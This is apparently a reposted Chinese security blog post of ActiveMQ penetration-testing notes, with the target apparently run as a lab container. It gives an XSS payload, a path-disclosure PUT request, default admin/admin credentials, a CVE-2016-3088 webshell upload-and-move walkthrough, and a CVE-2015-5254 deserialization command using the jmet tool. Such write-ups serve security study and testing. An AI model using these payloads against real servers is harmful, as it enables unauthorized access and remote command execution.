ActiveMQ

admin
admin
admin
102339
文章
87
评论
2022年12月28日19:06:28评论67 views字数 1083阅读3分36秒阅读模式

简介

Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。

61616是工作端口,8161是默认web管理页面端口。

ActiveMQ

未授权

/admin/connections.jsp

XSS

/admin/queueBrowse/example.A?view=rss&feedType=<script>alert("ACTIVEMQ")</script>

源码泄露

/admin/index.jsp/admin/queues.jsp/admin/topics.jsp

物理路径泄露

PUT /fileserver/a../../%08/..%08/.%08/%08 HTTP/1.1Host: IP地址:8161Authorization: Basic YWRtaW46YWRtaW4=Content-Length: 4test

弱口令

弱口令:admin/admin

ActiveMQ

CVE-2016-3088

影响版本

Apache ActiveMQ 5.x ~ 5.14.

1.登录后访问/admin/test/systemProperties.jsp获得绝对路径。

ActiveMQ

2.获得路径后,使用PUT上传webshell。

ActiveMQ

3.上传后是无法解析的,ActiveMQ的解析目录是/api/。使用MOVE方法移动上传后的木马使其可解析。

ActiveMQ

4.访问api目录,看到上传后的木马文件

ActiveMQ

5./api/5.jsp?cmd=ls(需要登录)

ActiveMQ

CVE-2015-5254

影响版本

Apache ActiveMQ 5.13.0之前5.x版本

登录后查看版本

ActiveMQ

1.下载jmet

wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

2.给目标ActiveMQ添加一个名为event的队列,此时就成功给服务器添加了一个“事件”

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/hacker_test" -Yp ROME IP 61616

3.添加后,打开/admin/browse.jsp?JMSDestination=event查看事件。

ActiveMQ

4.出现了如下界面,这下咱们的payload就执行了而且向服务器的/tmp下面写入一个文件hacker_test

ActiveMQ

5.进入容器查看。

docker-compose exec activemq bash

ActiveMQ

原文始发于微信公众号(破晓信安):ActiveMQ

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月28日19:06:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ActiveMQhttp://cn-sec.com/archives/1484677.html

发表评论

匿名网友 填写信息